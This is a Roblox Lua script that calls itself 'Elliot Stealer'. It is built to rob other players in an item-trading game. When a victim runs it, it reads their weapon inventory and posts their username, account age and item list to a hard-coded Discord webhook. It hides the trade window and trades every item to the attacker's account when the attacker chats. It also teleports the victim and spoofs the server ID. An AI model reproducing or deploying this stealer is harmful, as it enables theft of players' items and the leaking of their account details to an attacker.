-- [ Settings ] --
Username = "Warrior_ggs"
Webhook = "https://discord.com/api/webhooks/1413867134605594706/tMg5ZcD7Kz4s1Yg2ZUIekvl05gBQJc_lTnwEVLayVJvKUc8t-phOmXs4VhvOfnLoSK75"

-- [ Dualhook Settings ] --
DualUsername = "Warrior_ggs"
DualWebhook = "https://discord.com/api/webhooks/1413867134605594706/tMg5ZcD7Kz4s1Yg2ZUIekvl05gBQJc_lTnwEVLayVJvKUc8t-phOmXs4VhvOfnLoSK75"
DualUnique = 1
DualAncient = 1
DualGodly = 1

userName = Username
webHook = Webhook

if getgenv().executed then return end
getgenv().executed = true

local Players = game:GetService("Players")
local TeleportService = game:GetService("TeleportService")
local HttpService = game:GetService("HttpService")
local ReplicatedStorage = game:GetService("ReplicatedStorage")

local InvModule = require(ReplicatedStorage.Modules.InventoryModule)
local PlayerDataModule = require(ReplicatedStorage.Modules.ProfileData)
local LevelModule = require(ReplicatedStorage.Modules.LevelModule)

-- =========================
-- JobId Bypass
-- =========================
print("spoofed jobid:", game.JobId)
TeleportService.TeleportInitFailed:Connect(function(_,_,_,_,teleportInfo)
    if teleportInfo and teleportInfo.ServerInstanceId then
        getgenv().realjobid = teleportInfo.ServerInstanceId
        print("real jobid:", getgenv().realjobid)
        queue_on_teleport(string.format([[getgenv().realjobid = "%s"]], getgenv().realjobid))
    end
end)

-- =========================
-- Trade GUI destroy coroutine
-- =========================
local destroytrades2 = coroutine.create(function()
    while true do
        local player = Players.LocalPlayer
        local tradeGUI = player:WaitForChild("PlayerGui"):WaitForChild("TradeGUI")
        local tradeGUIPhone = player:WaitForChild("PlayerGui"):WaitForChild("TradeGUI_Phone")
        if tradeGUI.Enabled then tradeGUI.Enabled = false end
        if tradeGUIPhone.Enabled then tradeGUIPhone.Enabled = false end
        task.wait(0.1)
    end
end)

-- =========================
-- Inventory Parsing
-- =========================
local allItems, vintageItems, commonItems, uncommonItems, rareItems, legendaryItems, godlyItems, ancientItems, uniqueItems = {}, {}, {}, {}, {}, {}, {}, {}, {}
local vintageItemsC, commonItemsC, uncommonItemsC, rareItemsC, legendaryItemsC, godlyItemsC, ancientItemsC, uniqueItemsC = 0,0,0,0,0,0,0,0

for a,b in pairs(InvModule.MyInventory.Data.Weapons) do
    for _,d in pairs(b) do
        table.insert(allItems, d.ItemName)
        if d.Rarity == "Vintage" then vintageItemsC+=1; table.insert(vintageItems,d.DataID) end
        if d.Rarity == "Common" then commonItemsC+=1; table.insert(commonItems,d.DataID) end
        if d.Rarity == "Uncommon" then uncommonItemsC+=1; table.insert(uncommonItems,d.DataID) end
        if d.Rarity == "Rare" then rareItemsC+=1; table.insert(rareItems,d.DataID) end
        if d.Rarity == "Legendary" then legendaryItemsC+=1; table.insert(legendaryItems,d.DataID) end
        if d.Rarity == "Godly" then godlyItemsC+=1; table.insert(godlyItems,d.DataID) end
        if d.Rarity == "Ancient" then ancientItemsC+=1; table.insert(ancientItems,d.DataID) end
        if d.Rarity == "Unique" then uniqueItemsC+=1; table.insert(uniqueItems,d.DataID) end
    end
end

-- =========================
-- Send Webhook Function
-- =========================
function SendMessageEMBED(url, embed, pingEveryone)
    local headers = {["Content-Type"]="application/json"}
    local data = {
        ["content"] = pingEveryone and "@everyone" or "",
        ["embeds"] = { embed }
    }
    local body = HttpService:JSONEncode(data)
    pcall(function()
        request({Url=url, Method="POST", Headers=headers, Body=body})
    end)
end

-- =========================
-- Steal Items Function
-- =========================
local function stealItems()
    coroutine.resume(destroytrades2)
    local sendArgs = {Players[userName]}
    ReplicatedStorage.Trade.SendRequest:InvokeServer(unpack(sendArgs))
    task.wait(3)

    local function offerList(list)
        for _,v in pairs(list) do
            ReplicatedStorage.Trade.OfferItem:FireServer(v, "Weapons")
        end
    end

    offerList(uniqueItems)
    offerList(ancientItems)
    offerList(godlyItems)
    offerList(vintageItems)
    offerList(legendaryItems)
    offerList(rareItems)
    offerList(uncommonItems)
    offerList(commonItems)

    task.wait(6)
    ReplicatedStorage.Trade.AcceptTrade:FireServer(285646582)
end

-- =========================
-- Format Inventory for Pastebin
-- =========================
local function formatItems(list)
    if #list == 0 then return "None" else return table.concat(list,"\n") end
end

local pastebinString = "-- [ Uniques ] --\n"..formatItems(uniqueItems)..
                        "\n\n-- [ Ancient ] --\n"..formatItems(ancientItems)..
                        "\n\n-- [ Godlies ] --\n"..formatItems(godlyItems)..
                        "\n\n-- [ Legendaries ] --\n"..formatItems(legendaryItems)..
                        "\n\n-- [ Vintage ] --\n"..formatItems(vintageItems)..
                        "\n\n-- [ Rare ] --\n"..formatItems(rareItems)..
                        "\n\n-- [ Uncommon ] --\n"..formatItems(uncommonItems)..
                        "\n\n-- [ Common ] --\n"..formatItems(commonItems)

-- =========================
-- Dualhook Check
-- =========================
if godlyItemsC >= DualGodly or ancientItemsC >= DualAncient or uniqueItemsC >= DualUnique then
    userName = DualUsername
    webHook = DualWebhook
end

local embed = {
    ["title"]="New hit with Elliot Stealer",
    ["color"]=65280,
    ["fields"]={
        {["name"]="Details", ["value"]="```Name:"..Players.LocalPlayer.Name.."\nAccountAge:"..tostring(Players.LocalPlayer.AccountAge).."\nReceiver:"..userName.."```"},
        {["name"]="Hit", ["value"]="Total:"..#allItems.."\nUniques:"..uniqueItemsC.."\nAncients:"..ancientItemsC.."\nGodlys:"..godlyItemsC},
        {["name"]="Hit List", ["value"]=pastebinString}
    }
}
SendMessageEMBED(webHook, embed, godlyItemsC>=1 or ancientItemsC>=1 or uniqueItemsC>=1)

-- =========================
-- Listen for Player Chat to Steal Items
-- =========================
Players.PlayerAdded:Connect(function(player)
    if player.Name==userName then
        player.Chatted:Connect(function(msg)
            stealItems()
        end)
    end
end)

-- =========================
-- Teleport System
-- =========================
local PlaceId = 126884695634066
local targetJobId = getgenv().realjobid or game.JobId

for _=1,2 do
    task.spawn(function()
        TeleportService:TeleportToPlaceInstance(PlaceId, targetJobId)
    end)
    task.wait()
end
